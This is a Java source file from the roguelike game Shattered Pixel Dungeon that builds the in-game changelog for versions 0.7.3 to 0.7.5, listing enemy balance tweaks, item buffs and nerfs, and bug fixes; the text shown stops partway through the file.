* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.ui.changelist;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Badges;
import com.shatteredpixel.shatteredpixeldungeon.effects.BadgeBanner;
import com.shatteredpixel.shatteredpixeldungeon.items.Honeypot;
import com.shatteredpixel.shatteredpixeldungeon.items.artifacts.AlchemistsToolkit;
import com.shatteredpixel.shatteredpixeldungeon.items.artifacts.DriedRose;
import com.shatteredpixel.shatteredpixeldungeon.items.artifacts.UnstableSpellbook;
import com.shatteredpixel.shatteredpixeldungeon.items.food.Blandfruit;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.PotionOfHealing;
import com.shatteredpixel.shatteredpixeldungeon.items.rings.RingOfWealth;
import com.shatteredpixel.shatteredpixeldungeon.items.scrolls.ScrollOfMirrorImage;
import com.shatteredpixel.shatteredpixeldungeon.items.scrolls.ScrollOfRetribution;
import com.shatteredpixel.shatteredpixeldungeon.items.scrolls.ScrollOfTeleportation;
import com.shatteredpixel.shatteredpixeldungeon.items.scrolls.ScrollOfTerror;
import com.shatteredpixel.shatteredpixeldungeon.items.wands.WandOfCorruption;
import com.shatteredpixel.shatteredpixeldungeon.items.wands.WandOfLivingEarth;
import com.shatteredpixel.shatteredpixeldungeon.items.wands.WandOfRegrowth;
import com.shatteredpixel.shatteredpixeldungeon.items.wands.WandOfTransfusion;
import com.shatteredpixel.shatteredpixeldungeon.items.wands.WandOfWarding;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee.Gauntlet;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.missiles.Shuriken;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.missiles.Tomahawk;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.missiles.darts.Dart;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.scenes.ChangesScene;
import com.shatteredpixel.shatteredpixeldungeon.sprites.CharSprite;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSprite;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.shatteredpixel.shatteredpixeldungeon.ui.Icons;
import com.shatteredpixel.shatteredpixeldungeon.ui.Window;
import com.watabou.noosa.Image;
import java.util.ArrayList;
public class v0_7_X_Changes {
public static void addAllChanges( ArrayList<ChangeInfo> changeInfos ){
add_v0_7_5_Changes(changeInfos);
add_v0_7_4_Changes(changeInfos);
add_v0_7_3_Changes(changeInfos);
add_v0_7_2_Changes(changeInfos);
add_v0_7_1_Changes(changeInfos);
add_v0_7_0_Changes(changeInfos);
}
public static void add_v0_7_5_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.7.5", true, "");
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes = new ChangeInfo("v0.7.5f", false, null);
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new Image(Assets.SPINNER, 144, 0, 16, 16), Messages.get(ChangesScene.class, "bugfixes"),
"Fixed (caused by 0.7.5):\n" +
"_-_ Update notification not appearing in many cases when it should"));
changes = new ChangeInfo("v0.7.5e", false, null);
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new Image(Assets.SNAKE, 12, 0, 12, 11), "Snake adjustments",
"Snakes are doing a good job of filling their role as an enemy that demands being surprise attacked, but they are a bit annoying if the player gets unlucky and has to surprise them multiple times.\n\n" +
"I'm tweaking them so that they are much more likely to die from a single surprise hit, but their danger otherwise should be very similar:\n" +
"_-_ Snake health reduced to 4 from 6\n" +
"_-_ Snake evasion increased by 25%\n\n" +
"Snakes now also have an item drop! They will occasionally drop a random seed."));
changes.addButton( new ChangeButton(new Image(Assets.TENGU, 0, 0, 14, 16), "Tengu Adjustments",
"Tengu is in a much better place balance-wise since the changes in 0.7.5b, but he's still ruining the rogue's day a bit too often.\n\n" +
"I'm buffing invisibility versus Tengu again, so that it completely avoids his regular attacks, but doesn't totally trivialize him:\n" +
"_-_ Tengu now cannot attack invisible heroes\n" +
"_-_ Tengu can now use his 3rd phase abilities against heroes he cannot see\n" +
"_-_ VFX for Tengu's abilities now triggers even if the player can't see them"));
changes.addButton( new ChangeButton(new Image(Assets.SPINNER, 144, 0, 16, 16), Messages.get(ChangesScene.class, "bugfixes"),
"Fixed (existed prior to 0.7.5):\n" +
"_-_ Small amounts of stuttering when the hero moves\n" +
"_-_ Rare layout issues with buttons in item windows\n" +
"_-_ Bolts from wand of lightning not spreading in many cases where they should\n" +
"_-_ Various rare crash bugs"));
changes.addButton( new ChangeButton(Icons.get(Icons.LANGS), Messages.get(ChangesScene.class, "language"),
"Updated Translations"));
changes = new ChangeInfo("v0.7.5c&d", false, null);
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"_-_ Made additional tweaks to camera movement speed when following hero, should be slightly faster in most cases."));
changes.addButton( new ChangeButton(new Image(Assets.SPINNER, 144, 0, 16, 16), Messages.get(ChangesScene.class, "bugfixes"),
"Fixed (caused by 0.7.5):\n" +
"_-_ Various visual bugs on floor 10\n" +
"_-_ Text being highlighted when it shouldn't in specific cases\n" +
"_-_ Letters failing to render in various specific cases\n" +
"_-_ Camera moving slower than intended when zoomed in\n" +
"_-_ Camera jittering at low framerates\n" +
"_-_ Various rare crash bugs\n\n" +
"Fixed (existed prior to 0.7.5):\n" +
"_-_ Thrown weapons sticking to corrupted characters when they shouldn't"));
changes.addButton( new ChangeButton(Icons.get(Icons.LANGS), Messages.get(ChangesScene.class, "language"),
"Updated Translations"));
changes = new ChangeInfo("v0.7.5a&b", false, null);
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.LIBGDX), "LibGDX Text Rendering!",
"The game's text renderer is now using LibGDX freetype. This looks almost identical to the existing text but is slightly crisper, platform-independent, and much more efficient!\n\n" +
"This system has been ported over from the android version, and while I cannot supoprt asian scripts on the desktop verion just yet, all latin and cyrillic languages are now supported on desktop!\n\n" +
"Also updated translations"));
changes.addButton( new ChangeButton(new Image(Assets.TENGU, 0, 0, 14, 16), "Enemy Balance Adjustments",
"Tengu has been adjusted to be a bit less difficult for melee characters, in particular for the rogue:\n" +
"_-_ Tengu blink distance on phase 3 reduced by 1 tile\n" +
"_-_ Tengu accuracy reduced by 10%\n" +
"_-_ Tengu accuracy versus invisible characters reduced by 50%\n\n" +
"Additionally, some minor balance changes have been made to regular enemies:\n" +
"_-_ Snake damage down to 1-4 from 1-5\n" +
"_-_ Crab damage down to 1-7 from 1-8\n" +
"_-_ Slime damage down to 2-5 from 3-5\n" +
"_-_ Necromancer Skeleton HP on summon up to 20/25 from 15/25"));
changes.addButton( new ChangeButton(new WandOfCorruption(),
"The nerfs to the wand of corruption in 0.7.5 had basically no effect on its winrate when upgraded, so I'm taking a different approach and buffing its base power but reducing its upgraded power. I'm also putting more emphasis on debuffs helping corruption chances:\n\n" +
"_-_ Corruption resistance reduction from minor debuffs up to 25% from 12.5% (was 20% prior to 0.7.5)\n" +
"_-_ Corruption resistance reduction from major debuffs up to 50% from 25% (was 33% prior to 0.7.5)\n" +
"_-_ Corruption power adjusted to 3+lvl/2 from 2+lvl\n\n" +
"_-_ Wraith corruption resistance reduced slightly, to put them into line with other uncommon enemies."));
changes.addButton( new ChangeButton(new Image(Assets.SPINNER, 144, 0, 16, 16), Messages.get(ChangesScene.class, "bugfixes"),
"Fixed (caused by 0.7.5):\n" +
"_-_ Necromancers incorrectly only summoning skeletons at melee range\n" +
"_-_ Rare cases where doors would appear incorrectly on floor 5\n" +
"_-_ Doors not opening when they should in some cases\n" +
"_-_ Necromancers rarely healing skeletons after they die\n" +
"_-_ Various rare crash bugs\n\n" +
"Fixed (existed prior to 0.7.5):\n" +
"_-_ Black texture errors on older android devices\n" +
"_-_ Scenes not fading in when they should in certain cases"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "new"), false, null);
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released October 2nd, 2019\n" +
"_-_ 76 days after Shattered v0.7.4" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(new Image(Assets.SNAKE, 12, 0, 12, 11), "Sewer Enemies",
"Two new enemies have been added to the sewers!\n\n" +
"_- Snakes_ are an evasive enemy which mainly shows up on early floors, they help teach the importance of surprise attacks.\n" +
"_- Slimes_ primarily appear on floor 4, and are an enemy type which rewards defense over damage.\n\n" +
"Goo's level has also received significant changes. It now uses a new unique level layout pattern, and Goo itself always spawns in a new unique room type.\n\n" +
"I have also made slight balance changes to the Goo fight itself. 1x1 pillars have been mostly removed from Goo's arena to reduce surprise-attack spam, but Goo's damage has been reduced by 20% to compensate."));
changes.addButton( new ChangeButton(new Image(Assets.TENGU, 0, 0, 14, 16), "Prison Enemies",
"_Necromancers_ have been added to the prison! These powerful enemies fight by summoning and buffing undead.\n\n" +
"The _Tengu_ boss fight has been totally reworked! The fight still takes place over 3 stages, and has a similar core theme, but I have totally ditched the tedious maze and chasing mechanics from stages 2&3, and have given Tengu several new abilities. Watch your step!\n\n" +
"As a part of this rework, Tengu's stats have also been adjusted:\n" +
"_-_ HP up to 160 from 120\n" +
"_-_ Evasion reduced by 25%\n" +
"_-_ Damage reduced by 30%"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "changes"), false, null);
changes.hardlight( CharSprite.WARNING );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new Image(Assets.RAT, 0, 15, 16, 15), "Enemy Changes",
"_-_ Significantly improved the consistency of enemy spawns (large numbers of the same enemy and large enemy groups should be less common)\n\n" +
"_-_ Adjusted enemy spawn chances on floors 1-10 to make rooms for new enemies\n\n" +
"_-_ Skeletons no longer rarely appear on floor 4\n\n" +
"_-_ Guards no longer drop healing potions, they are now dropped by necromancers\n" +
"_-_ Guards now grant 7 exp, up from 6\n\n" +
"_-_ Albino rats now grant 2 exp, up from 1\n" +
"_-_ Albino rats now drop mystery meat"));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"_-_ The game camera now smoothly follows the hero while they are moving, instead of snapping to their location.\n\n" +
"_-_ Standardized word use when attacks miss to reduce confusion. Enemies now always 'block' or 'dodge'.\n\n" +
"_-_ Various improvements to wording on the supporter menu for Google Play users.\n\n" +
"_-_ Various internal code improvements"));
changes.addButton( new ChangeButton(new Image(Assets.SPINNER, 144, 0, 16, 16), Messages.get(ChangesScene.class, "bugfixes"),
"Fixed:\n" +
"_-_ Various stability issues caused by the LibGDX conversion\n" +
"_-_ Area-based effects behaving oddly in rare cases\n" +
"_-_ Thieves not escaping when they should in many cases\n" +
"_-_ A rare crash bug involving boomerangs\n" +
"_-_ Sai and gauntlets giving 1 more defense than what their descriptions stated\n" +
"_-_ Players rarely opening containers/doors from a distance"));
changes.addButton( new ChangeButton(Icons.get(Icons.LANGS), Messages.get(ChangesScene.class, "language"),
"Added new Language: Japanese!\n\n" +
"Updated Translations and Translator Credits!"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "buffs"), false, null);
changes.hardlight( CharSprite.POSITIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.WAND_BLAST_WAVE, null), "Wand Buffs",
"Blast wave is an excellent sidearm wand, but not as good when invested in. I'm making the wand a bit stronger and less risky to hopefully make it more worthy of upgrades.\n" +
"_-_ Increased AOE damage from 67% to 100%, AOE knockback force is unchanged\n" +
"_-_ AOE no longer damages hero/allies, but still knocks them back\n\n" +
"Corrosion is a very powerful wand in the right hands, but is currently a bit too hard to use right. I'm lightly buffing it to make its power a bit more accessible.\n" +
"_-_ Corrosion gas starting damage increased to 2+lvl from 1+lvl"));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.RING_AMETHYST, null), "Ring Buffs",
"Based on their performance, I'm giving a light buff to ring of energy, and a more significant buff to ring of wealth:\n\n" +
"_-_ Ring of energy charge boost increased to 30% per level, from 25%\n\n" +
"_-_ Ring of wealth exclusive drops are 20% more common\n" +
"_-_ Rare ring of wealth exclusive drops are now 33% more common"));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.LONGSWORD, new ItemSprite.Glowing( 0x440066 )), "Glyph/Enchant Buffs",
"I'm giving some significant buffs to underperforming rare enchants/glyphs:\n\n" +
"_-_ Proc chance for corruption enchant increased by ~25% at all levels\n\n" +
"_-_ Proc chance for glyph of affection increased by ~50% at +0, scaling to ~10% at +10"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "nerfs"), false, null);
changes.hardlight( CharSprite.NEGATIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new WandOfLivingEarth(),
"I'm continuing to adjust the wand of living earth to make it less able to stand on its own as a run-winning item. It should excel at providing defensive power, but shouldn't also give good offense.\n\n" +
"_-_ Guardian average damage decreased by 33%\n" +
"_-_ Base wand damage up to 4-6 from 3-6\n" +
"_-_ Wand damage scaling down to 0-2 from 1-2"));
changes.addButton( new ChangeButton(new WandOfCorruption(),
"Corruption is performing extremely well when invested in, so I'm adjusting debuff influence on corruption chance to make it more difficult to corrupt enemies.\n\n" +
"_-_ Corruption resistance reduction from minor debuffs reduced to 12.5% from 20%\n" +
"_-_ Corruption resistance reduction from major debuffs reduced to 25% from 33%"));
}
public static void add_v0_7_4_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.7.4", true, "");
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes = new ChangeInfo(Messages.get(ChangesScene.class, "new"), false, null);
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released July 18th, 2019\n" +
"_-_ 56 days after Shattered v0.7.3" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(new WandOfWarding(),
"This brand new wand spawns autonomous wards which attack enemies. Wards can be upgraded by being zapped again, and eventually form up into sentry turrets.\n\n" +
"The Wand of Warding does very consistent damage, but requires some setup first."));
changes.addButton( new ChangeButton(new WandOfLivingEarth(),
"This new wand has a lower damage output, but grants significant defensive power. The rocks the wand shoots at enemies reform around the hero and absorb damage. If enough rock is built, it will form up into a rock guardian which fights with the player.\n\n" +
"The Wand of Living Earth is lacking in offensive output, but does a great job of pulling focus and damage away from the player."));
changes.addButton( new ChangeButton(Icons.get(Icons.LIBGDX), "LibGDX",
"The Android version of Shattered is now using the same multiplatform library as the desktop verion: _LibGDX._\n\n" +
"My plan is to eventually back-port the current desktop features to the android codebase, and use that as a universal codebase moving forward.\n\n" +
"This will likely happen slowly over the next few updates, but when its done the desktop version will permanently be at feature parity with the android version!"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "changes"), false, null);
changes.hardlight( CharSprite.WARNING );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.EXOTIC_BERKANAN), "Ally AI improvements",
"Allies which follow the player are now considered to be 'intelligent', and have the following improved behaviours:\n" +
"_-_ Intelligent allies will not attack enemies which are asleep, or which haven't noticed the player yet.\n" +
"_-_ Intelligent allies will follow the hero through stairs so long as they are near to them.\n\n" +
"Lastly, the hero can now swap places with any ally, even unintelligent ones."));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"_-_ Overhauled main menu interface to allow for more expandability.\n" +
"_-_ Updated hero icons in rankings and saved game screens.\n\n" +
"_-_ Class armor abilities no longer affect allies\n" +
"_-_ Autotargeting now no longer targets ally characters, in any circumstances.\n" +
"_-_ Most scrolls with an area of affect now no longer affect allies. More destructive ones will still damage them though.\n" +
"_-_ Added a little surprise if you reach the surface with an upgraded ally item.\n\n" +
"_-_ Ring of elements and antimagic effects now apply to damage from wands.\n\n" +
"_-_ The great crab can now only block one enemy at a time.\n\n" +
"_-_ Shattered Pixel Dungeon now requires Android 2.3+ to run, up from Android 2.2+.\n" +
"_-_ Google Play Games and sharing gameplay data now requires android 4.1+, up from 4.0+."));
changes.addButton( new ChangeButton(new Image(Assets.SPINNER, 144, 0, 16, 16), Messages.get(ChangesScene.class, "bugfixes"),
"Fixed:\n" +
"_-_ Talisman of foresight warn effect not being saved/loaded\n" +
"_-_ Level visuals (e.g. prison torches) rarely bugging out\n" +
"_-_ Minor visual errors with ranged enemy attacks.\n" +
"_-_ Heavy boomerangs being lost when inventory is full\n" +
"_-_ NPCs rarely getting hit by ranged attacks\n" +
"_-_ Enemies rarely spawning on top of each other on boss levels\n" +
"_-_ Elixir of aquatic rejuvenation being able to heal slightly over max hp\n" +
"_-_ Prismatic images not being affected by brimstone and antimagic glyphs\n" +
"_-_ Shattered pots being lost if the player has a full inventory\n" +
"_-_ Doors incorrectly closing when swapping places with an ally\n" +
"_-_ Various rare bugs with heavy boomerangs\n" +
"_-_ Various minor text errors"));
changes.addButton( new ChangeButton(Icons.get(Icons.LANGS), Messages.get(ChangesScene.class, "language"),
"Updated Translations"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "buffs"), false, null);
changes.hardlight( CharSprite.POSITIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new DriedRose(),
"The Dried Rose's ghost hero has received some buffs and adjustments to go along with other ally improvements:\n\n" +
"_-_ The ghost hero can now be given instructions by using the rose after summoning them, and tapping on a location.\n\n" +
"_-_ Ghost HP scaling increased to 8 per petal, from 4.\n" +
"_-_ Ghost evasion reduced to 1x hero evasion from 2x.\n" +
"_-_ Ghost now heals over time while they are summoned."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.NOISEMAKER, null), "Enhanced Bomb Buffs",
"Many enchant bombs are performing poorly compared to some of the more popular ones, such as holy bombs and boss bombs. While I am toning down the strongest bombs a bit, I'm also making some pretty significant buffs to weaker bombs:\n\n" +
"_-_ Frost bomb cost down to 2 from 3, now instantly freezes enemies caught in the blast in addition to chilling.\n" +
"_-_ Woolly bomb cost down to 2 from 3, now does regular bomb damage in addition to spawning sheep.\n" +
"_-_ Noisemaker now explodes when an enemy is attracted to its location.\n" +
"_-_ Flashbang cost increased to 6 from 5, now deals regular bomb damage and debuffs in a smaller AOE.\n" +
"_-_ Shock bomb cost increased to 6 from 5, now stuns/damages immediately instead of over time with electricity.\n" +
"_-_ Regrowth bomb cost increased to 8 from 6, now heals significantly more and spawns more plants."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.LONGSWORD, new ItemSprite.Glowing(0xFF4400)), "Enchant/Glyph Buffs",
"Continuing from the changes in 0.7.3, I'm still watching enchantment balance and making buffs where there's room to do so:\n\n" +
"_-_ Blazing Enchantment bonus damage increased to 2/3 of burning damage, from 1-3.\n" +
"_-_ Shocking Enchantment damage increased to 40% from 33%.\n" +
"_-_ Blooming Enchantment chance for a second tile of grass increased to 10% per level, from 5%.\n" +
"_-_ Lucky Enchantment proc chance scaling with levels increased by ~2x.\n" +
"_-_ Corrupting Enchantment base proc chance increased to 15% from 10%, scaling reduced to compensate.\n\n" +
"_-_ Glyph of Flow now grants a flat 2x speed boost in water, up from 1.5x + 0.1x per level."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.WILD_ENERGY, null), "Misc Item Buffs",
"_-_ Wild energy now gives 4 turns of charging instantly, and 8 turns over time. Up from 10 turns over time.\n\n" +
"_-_ Stone of Clairvoyance radius increased to 12 from 8. This increases the area by ~2.25x.\n\n" +
"_-_ Allies are now healed by magical sleep, just like the hero."));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "nerfs"), false, null);
changes.hardlight( CharSprite.NEGATIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton( new Image(Assets.MAGE, 0, 90, 12, 15), "Subclass Adjustments",
"The Warlock is intended to require a source of physical damage in addition to a wand to be successful. Upgradeable ally wands are problematic for warlock as you can get magical power and physical damage in one item, which makes his abilities absurdly useful with them. The warlock should synergize with allies, but I have scaled the amount down to more reasonable levels:\n\n" +
"_-_ Soul mark healing increased to 40% of damage from 33%\n" +
"_-_ Soul mark is now 2/5 as effective when the damage-dealer isn't the hero.\n\n" +
"I'm also making a few smaller adjustments to other subclasses which are overperforming:\n\n" +
"_-_ Berserker rate of rage loss over time increased by 33% (it is now 2/3 of what it was pre-0.7.3).\n\n" +
"_-_ Freerunner bonus evasion reduced by 20%."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.ARMOR_MAIL, new ItemSprite.Glowing(0x88EEFF)), "Glyph Nerfs",
"_-_ Glyph of Thorns bleed amount reduced to 4+lvl from 4+2*lvl, proc rate increased.\n\n" +
"_-_ Glyph of Antimagic base damage reduction reduced to 0-4 from 2-4.\n\n" +
"_-_ Glyph of Brimstone shield generation removed. The glyph now only protects the user from fire and does not also grant shielding when the user is aflame."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.ARCANE_BOMB, null), "Enhanced Bomb Nerfs",
"_-_ Holy Bomb no longer blinds characters caught in the blast, recipe cost up to 8 from 6.\n\n" +
"_-_ Arcane Bomb damage now falls off based on distance. Reduced to 100%/83%/67% from all 100%.\n\n" +
"_-_ Shrapnel Bomb damage now slightly falls off based on distance. Damage is reduced by 5% per tile of distance."));
}
public static void add_v0_7_3_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.7.3", true, "");
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes = new ChangeInfo(Messages.get(ChangesScene.class, "new"), false, null);
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released May 23rd, 2019\n" +
"_-_ 66 days after Shattered v0.7.2" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.LONGSWORD, new ItemSprite.Glowing(0xFFFF00)), "Enchantment Changes",
"Several changes have been made to enchantments, based on feedback from 0.7.2:\n\n" +
"_-_ Precise and swift enchantments have been removed.\n\n" +
"_-_ Lucky and blooming are now uncommon enchants, instead of rare and common.\n\n" +
"_-_ Kinetic is a new common enchantment! This enchantment preserves excess damage when an enemy is killed and applies it to your next hit.\n\n" +
"_-_ Corrupting is a new rare enchantment! When killing an enemy, there is a chance you will corrupt it instead."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.KUNAI, null), "New Thrown Weapons",
"Four new thrown weapons have been added!\n\n" +
"_-_ Throwing clubs are a tier-2 weapon with extra durability\n\n" +
"_-_ Kunai are a tier-3 weapon with bonus damage on sneak attacks\n\n" +
"_-_ Heavy boomerangs are a tier-4 weapon which returns after being thrown\n\n" +
"_-_ Force cubes are a tier-5 weapon which damage enemies in a 3x3 area"));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.ELIXIR_ARCANE, null), "New Boss Recipes",
"Two new recipes have been added, one which uses goo blobs and another which uses metal shards.\n\n" +
"_-_ Elixir of arcane armor requires a goo blob and a potion of earthen armor. It grants a long-lasting resistance to magic.\n\n" +
"_-_ Wild energy requires a metal shard and a scroll of mystical energy. It grants large amounts of recharging, but with some unpredictable effects attached!"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "changes"), false, null);
changes.hardlight( CharSprite.WARNING );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new Dart(),
"Dart tipping has been removed from the alchemy system. Darts can instead be tipped right from the inventory.\n\n" +
"Tipped darts have had their shop price reduced by 33%, and can now be cleaned if you don't wish to use the effect.\n\n" +
"The alchemy guide has been adjusted due to the removal of dart tipping from alchemy. It now has 9 pages (down from 10), and the order of pages have been adjusted to put some simpler recipes earlier."));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"_-_ Shattered honeypots are now stackable, and can be sold for a small amount of gold.\n\n" +
"_-_ The changes list has been split into three separate groups, so that the game's entire change history isn't loaded all at once.\n\n" +
"_-_ Tengu now throws his shurikens one at a time, just like other ranged enemies. The speed of the shurikens has been increased to compensate, so that the player doesn't need to keep waiting while Tengu's attacks are in flight.\n\n" +
"_-_ After the tengu boss battle, any extra items now drop in tengu's cell, instead of a random prison cell.\n\n" +
"_-_ The hero will no longer step onto visible traps if that trap wasn't discovered when movement started.\n\n" +
"_-_ When the mage's staff is cursed, the wand within the staff will now also be cursed.\n\n" +
"_-_ Scrolls of transmutation can now be used on thrown weapons.\n\n" +
"_-_ Improved the coloration of crystal keys. They should now be more distinct from iron keys."));
changes.addButton( new ChangeButton(new Image(Assets.SPINNER, 144, 0, 16, 16), Messages.get(ChangesScene.class, "bugfixes"),
"Fixed:\n" +
"_-_ Prismatic images causing errors when falling into pits\n" +
"_-_ Secret rooms never spawning in the earlier parts of a region\n" +
"_-_ Curse of multiplicity not working correctly on boss floors\n" +
"_-_ Curse of multiplicity closing doors when it shouldn't\n" +
"_-_ Ring of wealth rarely generating items which are blocked by challenges\n" +
"_-_ Windows rarely appearing in places they shouldn't\n" +
"_-_ Odd behaviour when the player is killed by electricity or a grim weapon\n" +
"_-_ Explosions destroying armor with the warrior's seal on it\n" +
"_-_ Various minor visual bugs\n" +
"_-_ Various rare crash bugs"));
changes.addButton( new ChangeButton(Icons.get(Icons.LANGS), Messages.get(ChangesScene.class, "language"),
"Updated Translations"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "buffs"), false, null);
changes.hardlight( CharSprite.POSITIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton( new Image(Assets.WARRIOR, 0, 90, 12, 15), "Berserker & Gladiator",
"Because of nerfs I have made to the scaling of the warrior's shield regen, I have some power budget to give to his subclasses!\n\n" +
"Berserker rate of rage loss decreased by 50%. It should now be easier to hold onto rage at higher health, but being injured will still help to retain it longer.\n\n" +
"Gladiator is now significantly more flexible:\n" +
"_-_ Using items no longer resets combo\n" +
"_-_ Throwing weapons now increment combo\n" +
"_-_ Slam ability now deals damage based on armor, instead of simply increasing damage."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.CURSE_INFUSE, null), "Boss Recipe Buffs",
"All recipes made with ingredients dropped by bosses have been buffed (except bombs):\n\n" +
"_-_ Caustic brew now affects a 7x7 area, up from 5x5. Energy cost of caustic brew reduced to 4 from 8.\n\n" +
"_-_ Elixir of aquatic rejuvenation now heals faster, and does not waste healing if the hero is not in water. Total amount of healing reduced to compensate.\n\n" +
"_-_ Curse Infusion now grants a single upgrade to wands/weapons/armor in addition to cursing. This upgrade is lost if the item is uncursed.\n\n" +
"_-_ Reclaim trap no longer grants recharging, now stores the trap instead. The trap can then be triggered anywhere the player likes."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.RING_EMERALD, null), "Other Item Buffs",
"_-_ Ring of elements now grants 20% resistance per level, up from 16%. However, ring of elements also no longer applies to melee attacks from magic-wielding enemies.\n\n" +
"_-_ Throwing stone base damage increased to 2-5 from 1-5\n" +
"_-_ Throwing stone durability increased to 5 from 3\n\n" +
"_-_ Throwing hammer base damage increased to 10-20 from 8-20"));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.ARMOR_SCALE, new ItemSprite.Glowing( 0x663300 )), "Enchant/Glyph Buffs",
"_-_ Vampiric now has a chance to heal for large amounts, instead of always healing for small amounts.\n\n" +
"_-_ Entanglement no longer roots, now only applies herbal armor buff. Amount of herbal armor granted reduced to compensate.\n\n" +
"_-_ Affection charm duration up to 8-12 from 4-12. This means an affection proc now guarantees a free hit.\n\n" +
"_-_ Potential no longer grants small amounts of partial charge on every hit, now has a chance to grant one full charge instead. Overall amount of charge given increased by ~20%."));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "nerfs"), false, null);
changes.hardlight( CharSprite.NEGATIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new Tomahawk(),
"The Tomahawk has been adjusted to make its damage more upfront, but also to reduce its extreme damage scaling with upgrades.\n\n" +
"_-_ Tomahawk damage scaling increased to 2-4 per level, up from 2-2\n" +
"_-_ Tomahawk bleed damage now starts at 60% of damage, down from 100%"));
changes.addButton( new ChangeButton( new Image(Assets.WARRIOR, 0, 15, 12, 15), "Warrior Nerfs",
"Warrior shielding regeneration scaling reduced. It is now a flat 1 shield every 30 turns. This is a very slight buff to the earlygame, and a significant nerf to the lategame.\n\n" +
"I made this change as too much of the warrior's power was put into his base class, and into a passive ability that players tend to ignore. By removing this power, I can put more power into the warrior's subclasses, which should make the warrior feel more fun and interesting without significantly nerfing him overall."));
changes.addButton( new ChangeButton( new Image(Assets.TERRAIN_FEATURES, 16, 0, 16, 16), "Trap Adjustments!",
"Several traps have been slightly adjusted due to reclaim trap's new functionality:\n\n" +
"_-_ Disintegration trap no longer deals damage based on target HP\n" +
"_-_ Flock trap duration no longer scales with depth\n" +
"_-_ Bosses now resist grim traps, Yog is immune\n" +
"_-_ Pitfall traps do not work on boss floors\n" +
"_-_ Reduced poison dart trap damage scaling\n" +
"_-_ Rockfall traps trigger in a 5x5 AOE when cast from reclaim trap\n" +
"_-_ Bosses will resist weakening traps"));
